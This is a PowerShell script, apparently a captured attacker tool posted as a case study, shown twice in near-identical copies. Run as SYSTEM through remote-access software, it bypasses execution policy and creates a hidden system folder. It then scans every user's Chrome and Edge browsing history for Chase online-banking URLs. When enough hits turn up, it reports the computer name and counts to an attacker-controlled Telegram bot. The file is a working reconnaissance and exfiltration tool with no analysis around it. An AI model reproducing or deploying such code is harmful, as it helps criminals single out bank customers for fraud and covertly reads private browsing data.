Purp1eW0lf/Case_study_three_Chase_Telegram.ps1

## Case_study_three_Chase_Telegram.ps1
	# ===============================================
	# Scan Chrome + Edge history files (ALL users, ALL profiles)
	# Search for "secure.chase.com" directly in History DB (no SQLite module)
	# Save matches to C:\H\History.txt
	# Save PC Name + User + count to C:\H\results.txt
	# If count > 10 send results.txt content to Telegram
	# Designed for running as service user (SYSTEM) via SimpleHelp
	# ===============================================

	try {
		Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force -ErrorAction Stop
	} catch {}

	$ErrorActionPreference = 'Stop'
	$ProgressPreference    = 'SilentlyContinue'

	# ------------------------------------------------
	# Prepare folder C:\H
	# ------------------------------------------------
	$outFolder   = "C:\H"
	$outFile     = Join-Path $outFolder "History.txt"
	$resultsFile = Join-Path $outFolder "results.txt"

	if (-not (Test-Path $outFolder)) {
		try {
			New-Item $outFolder -ItemType Directory -Force | Out-Null
			Write-Host "Created folder: $outFolder"
		}
		catch {
			Write-Error ("Failed to create folder {0}. Error: {1}" -f $outFolder, $_.Exception.Message)
			exit 1
		}
	}

	if (Test-Path $outFolder) {
		try {
			(Get-Item $outFolder -Force).Attributes = 'Hidden','System'
			Write-Host "Output folder ready (hidden): $outFolder"
		}
		catch {
			Write-Warning ("Failed to set attributes on {0}. Error: {1}" -f $outFolder, $_.Exception.Message)
		}
	} else {
		Write-Error ("Folder {0} does not exist. Script stopped." -f $outFolder)
		exit 1
	}

	# ------------------------------------------------
	# Function: scan one History file as binary and find QBO URLs
	# ------------------------------------------------
	function Get-QboFromHistoryFile {
		param(
			[string]$Browser,
			[string]$UserFolder,
			[string]$ProfileName,
			[string]$HistoryPath
		)

		$items = @()

		if (-not (Test-Path $HistoryPath)) {
			return $items
		}

		# Copy to temp to avoid file locks
		$tempHistory = Join-Path $env:TEMP ("Hist_{0}_{1}_{2}.db" -f $Browser, $UserFolder.Replace('\','_'), $ProfileName)

		try {
			Copy-Item $HistoryPath $tempHistory -Force -ErrorAction Stop
		}
		catch {
			Write-Warning ("Failed to copy history file {0}. Error: {1}" -f $HistoryPath, $_.Exception.Message)
			return $items
		}

		try {
			# Read raw bytes and convert to ASCII string
			$bytes = [System.IO.File]::ReadAllBytes($tempHistory)
			if (-not $bytes -or $bytes.Length -eq 0) {
				return $items
			}

			$text = [System.Text.Encoding]::ASCII.GetString($bytes)

			# Regex options
			$regexOptions = [System.Text.RegularExpressions.RegexOptions]::IgnoreCase
			$pattern      = 'https?://secure\.chase\.com[^\x00\s"]*'

			$matches = [System.Text.RegularExpressions.Regex]::Matches($text, $pattern, $regexOptions)

			foreach ($m in $matches) {
				$items += [PSCustomObject]@{
					Browser    = $Browser
					UserFolder = $UserFolder
					Profile    = $ProfileName
					Url        = $m.Value
				}
			}
		}
		catch {
			Write-Warning ("Failed to scan history file {0}. Error: {1}" -f $HistoryPath, $_.Exception.Message)
		}
		finally {
			try { Remove-Item $tempHistory -Force -ErrorAction SilentlyContinue } catch {}
		}

		return $items
	}

	# ------------------------------------------------
	# Function: scan all profiles for a browser for ALL users
	# ------------------------------------------------
	function Scan-ChromiumAllUsers {
		param(
			[string]$BrowserName,      # "Chrome" or "Edge"
			[string]$RelativeBasePath  # e.g. "AppData\Local\Google\Chrome\User Data"
		)

		$results = @()
		$usersRoot = "C:\Users"

		if (-not (Test-Path $usersRoot)) {
			return $results
		}

		Get-ChildItem $usersRoot -Directory -ErrorAction SilentlyContinue | ForEach-Object {
			$userDir    = $_.FullName
			$userName   = $_.Name
			$baseFolder = Join-Path $userDir $RelativeBasePath

			if (-not (Test-Path $baseFolder)) {
				return
			}

			# Profiles under User Data
			Get-ChildItem $baseFolder -Directory -ErrorAction SilentlyContinue | ForEach-Object {
				$profileName = $_.Name
				$historyPath = Join-Path $_.FullName "History"

				if (Test-Path $historyPath) {
					$results += Get-QboFromHistoryFile -Browser $BrowserName -UserFolder $userName -ProfileName $profileName -HistoryPath $historyPath
				}
			}
		}

		return $results
	}

	# ------------------------------------------------
	# Scan Chrome and Edge for all users
	# ------------------------------------------------
	Write-Host "Scanning Chrome and Edge history files for secure.chase.com ..."

	$allMatches = @()

	$chromeRel = "AppData\Local\Google\Chrome\User Data"
	$edgeRel   = "AppData\Local\Microsoft\Edge\User Data"

	$allMatches += Scan-ChromiumAllUsers -BrowserName "Chrome" -RelativeBasePath $chromeRel
	$allMatches += Scan-ChromiumAllUsers -BrowserName "Edge"   -RelativeBasePath $edgeRel

	# Remove duplicate URLs (optional)
	$allMatches = $allMatches | Select-Object Browser,UserFolder,Profile,Url -Unique

	$count = $allMatches.Count
	Write-Host ("Total secure.chase.com entries found: {0}" -f $count)

	# Показать в каком браузере сколько результатов
	$byBrowser = $allMatches | Group-Object Browser | Sort-Object Count -Descending

	Write-Host "Results by browser:"
	$byBrowser | ForEach-Object {
		Write-Host ("  {0}: {1}" -f $_.Name, $_.Count)
	}


	# Count total Chrome profiles across ALL users Посчитать общее количество профилей Chrome (User Data*)
	$chromeProfiles = @()
	$usersRoot = "C:\Users"
	$chromeRel = "AppData\Local\Google\Chrome\User Data"

	Get-ChildItem $usersRoot -Directory -ErrorAction SilentlyContinue | ForEach-Object {
		$base = Join-Path $_.FullName $chromeRel
		if (Test-Path $base) {
			Get-ChildItem $base -Directory -ErrorAction SilentlyContinue | ForEach-Object {
				# Chrome profiles usually contain a History file
				if (Test-Path (Join-Path $_.FullName "History")) {
					$chromeProfiles += [PSCustomObject]@{
						User    = $_.Parent.Parent.Parent.Name
						Profile = $_.Name
					}
				}
			}
		}
	}

	$chromeProfileCount = $chromeProfiles.Count
	Write-Host ("Total Chrome profiles found: {0}" -f $chromeProfileCount)

	#3. (Опционально) Показать Chrome профили с совпадениями

	Write-Host "Chrome profiles with matches:"
	$allMatches |
		Where-Object { $_.Browser -eq 'Chrome' } |
		Group-Object UserFolder,Profile |
		ForEach-Object {
			Write-Host ("  User={0}, Profile={1}, Count={2}" -f `
				$_.Group[0].UserFolder,
				$_.Group[0].Profile,
				$_.Count)
		}


	#тут пишем колво, если каунт больше 10 шлем увед в тг
	if ($count -gt 30) {
		$pc = $env:COMPUTERNAME

		# Build compact browser summary: "Chrome=10; Edge=15"
		$browserSummary = ($byBrowser | ForEach-Object { "{0}={1}" -f $_.Name, $_.Count }) -join "; "

		$BOT_TOKEN = "<Redacted>"
		$CHAT_ID   = "<Redacted>"

		$msg = "$pc | secure.chase.com total=$count | $browserSummary"

		try {
			Invoke-RestMethod -Uri ("https://api.telegram.org/bot{0}/sendMessage" -f $BOT_TOKEN) `
				-Method Post `
				-ContentType "application/x-www-form-urlencoded" `
				-Body @{ chat_id = $CHAT_ID; text = $msg } | Out-Null
			Write-Host "Telegram: sent"
		} catch {
			Write-Host ("Telegram: FAILED - {0}" -f $_.Exception.Message)
		}
	}
	# ===============================================
	# Scan Chrome + Edge history files (ALL users, ALL profiles)
	# Search for "secure.chase.com" directly in History DB (no SQLite module)
	# Save matches to C:\H\History.txt
	# Save PC Name + User + count to C:\H\results.txt
	# If count > 10 send results.txt content to Telegram
	# Designed for running as service user (SYSTEM) via SimpleHelp
	# ===============================================

	try {
	Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force -ErrorAction Stop
	} catch {}

	$ErrorActionPreference = 'Stop'
	$ProgressPreference = 'SilentlyContinue'

	# ------------------------------------------------
	# Prepare folder C:\H
	# ------------------------------------------------
	$outFolder = "C:\H"
	$outFile = Join-Path $outFolder "History.txt"
	$resultsFile = Join-Path $outFolder "results.txt"

	if (-not (Test-Path $outFolder)) {
	try {
	New-Item $outFolder -ItemType Directory -Force \| Out-Null
	Write-Host "Created folder: $outFolder"
	}
	catch {
	Write-Error ("Failed to create folder {0}. Error: {1}" -f $outFolder, $_.Exception.Message)
	exit 1
	}
	}

	if (Test-Path $outFolder) {
	try {
	(Get-Item $outFolder -Force).Attributes = 'Hidden','System'
	Write-Host "Output folder ready (hidden): $outFolder"
	}
	catch {
	Write-Warning ("Failed to set attributes on {0}. Error: {1}" -f $outFolder, $_.Exception.Message)
	}
	} else {
	Write-Error ("Folder {0} does not exist. Script stopped." -f $outFolder)
	exit 1
	}

	# ------------------------------------------------
	# Function: scan one History file as binary and find QBO URLs
	# ------------------------------------------------
	function Get-QboFromHistoryFile {
	param(
	[string]$Browser,
	[string]$UserFolder,
	[string]$ProfileName,
	[string]$HistoryPath
	)

	$items = @()

	if (-not (Test-Path $HistoryPath)) {
	return $items
	}

	# Copy to temp to avoid file locks
	$tempHistory = Join-Path $env:TEMP ("Hist_{0}_{1}_{2}.db" -f $Browser, $UserFolder.Replace('\','_'), $ProfileName)

	try {
	Copy-Item $HistoryPath $tempHistory -Force -ErrorAction Stop
	}
	catch {
	Write-Warning ("Failed to copy history file {0}. Error: {1}" -f $HistoryPath, $_.Exception.Message)
	return $items
	}

	try {
	# Read raw bytes and convert to ASCII string
	$bytes = [System.IO.File]::ReadAllBytes($tempHistory)
	if (-not $bytes -or $bytes.Length -eq 0) {
	return $items
	}

	$text = [System.Text.Encoding]::ASCII.GetString($bytes)

	# Regex options
	$regexOptions = [System.Text.RegularExpressions.RegexOptions]::IgnoreCase
	$pattern = 'https?://secure\.chase\.com[^\x00\s"]*'

	$matches = [System.Text.RegularExpressions.Regex]::Matches($text, $pattern, $regexOptions)

	foreach ($m in $matches) {
	$items += [PSCustomObject]@{
	Browser = $Browser
	UserFolder = $UserFolder
	Profile = $ProfileName
	Url = $m.Value
	}
	}
	}
	catch {
	Write-Warning ("Failed to scan history file {0}. Error: {1}" -f $HistoryPath, $_.Exception.Message)
	}
	finally {
	try { Remove-Item $tempHistory -Force -ErrorAction SilentlyContinue } catch {}
	}

	return $items
	}

	# ------------------------------------------------
	# Function: scan all profiles for a browser for ALL users
	# ------------------------------------------------
	function Scan-ChromiumAllUsers {
	param(
	[string]$BrowserName, # "Chrome" or "Edge"
	[string]$RelativeBasePath # e.g. "AppData\Local\Google\Chrome\User Data"
	)

	$results = @()
	$usersRoot = "C:\Users"

	if (-not (Test-Path $usersRoot)) {
	return $results
	}

	Get-ChildItem $usersRoot -Directory -ErrorAction SilentlyContinue \| ForEach-Object {
	$userDir = $_.FullName
	$userName = $_.Name
	$baseFolder = Join-Path $userDir $RelativeBasePath

	if (-not (Test-Path $baseFolder)) {
	return
	}

	# Profiles under User Data
	Get-ChildItem $baseFolder -Directory -ErrorAction SilentlyContinue \| ForEach-Object {
	$profileName = $_.Name
	$historyPath = Join-Path $_.FullName "History"

	if (Test-Path $historyPath) {
	$results += Get-QboFromHistoryFile -Browser $BrowserName -UserFolder $userName -ProfileName $profileName -HistoryPath $historyPath
	}
	}
	}

	return $results
	}

	# ------------------------------------------------
	# Scan Chrome and Edge for all users
	# ------------------------------------------------
	Write-Host "Scanning Chrome and Edge history files for secure.chase.com ..."

	$allMatches = @()

	$chromeRel = "AppData\Local\Google\Chrome\User Data"
	$edgeRel = "AppData\Local\Microsoft\Edge\User Data"

	$allMatches += Scan-ChromiumAllUsers -BrowserName "Chrome" -RelativeBasePath $chromeRel
	$allMatches += Scan-ChromiumAllUsers -BrowserName "Edge" -RelativeBasePath $edgeRel

	# Remove duplicate URLs (optional)
	$allMatches = $allMatches \| Select-Object Browser,UserFolder,Profile,Url -Unique

	$count = $allMatches.Count
	Write-Host ("Total secure.chase.com entries found: {0}" -f $count)

	# Показать в каком браузере сколько результатов
	$byBrowser = $allMatches \| Group-Object Browser \| Sort-Object Count -Descending

	Write-Host "Results by browser:"
	$byBrowser \| ForEach-Object {
	Write-Host (" {0}: {1}" -f $_.Name, $_.Count)
	}



	# Count total Chrome profiles across ALL users Посчитать общее количество профилей Chrome (User Data*)
	$chromeProfiles = @()
	$usersRoot = "C:\Users"
	$chromeRel = "AppData\Local\Google\Chrome\User Data"

	Get-ChildItem $usersRoot -Directory -ErrorAction SilentlyContinue \| ForEach-Object {
	$base = Join-Path $_.FullName $chromeRel
	if (Test-Path $base) {
	Get-ChildItem $base -Directory -ErrorAction SilentlyContinue \| ForEach-Object {
	# Chrome profiles usually contain a History file
	if (Test-Path (Join-Path $_.FullName "History")) {
	$chromeProfiles += [PSCustomObject]@{
	User = $_.Parent.Parent.Parent.Name
	Profile = $_.Name
	}
	}
	}
	}
	}

	$chromeProfileCount = $chromeProfiles.Count
	Write-Host ("Total Chrome profiles found: {0}" -f $chromeProfileCount)

	#3. (Опционально) Показать Chrome профили с совпадениями

	Write-Host "Chrome profiles with matches:"
	$allMatches \|
	Where-Object { $_.Browser -eq 'Chrome' } \|
	Group-Object UserFolder,Profile \|
	ForEach-Object {
	Write-Host (" User={0}, Profile={1}, Count={2}" -f `
	$_.Group[0].UserFolder,
	$_.Group[0].Profile,
	$_.Count)
	}



	#тут пишем колво, если каунт больше 10 шлем увед в тг
	if ($count -gt 30) {
	$pc = $env:COMPUTERNAME

	# Build compact browser summary: "Chrome=10; Edge=15"
	$browserSummary = ($byBrowser \| ForEach-Object { "{0}={1}" -f $_.Name, $_.Count }) -join "; "

	$BOT_TOKEN = "<Redacted>"
	$CHAT_ID = "<Redacted>"

	$msg = "$pc \| secure.chase.com total=$count \| $browserSummary"

	try {
	Invoke-RestMethod -Uri ("https://api.telegram.org/bot{0}/sendMessage" -f $BOT_TOKEN) `
	-Method Post `
	-ContentType "application/x-www-form-urlencoded" `
	-Body @{ chat_id = $CHAT_ID; text = $msg } \| Out-Null
	Write-Host "Telegram: sent"
	} catch {
	Write-Host ("Telegram: FAILED - {0}" -f $_.Exception.Message)
	}
	}
No results found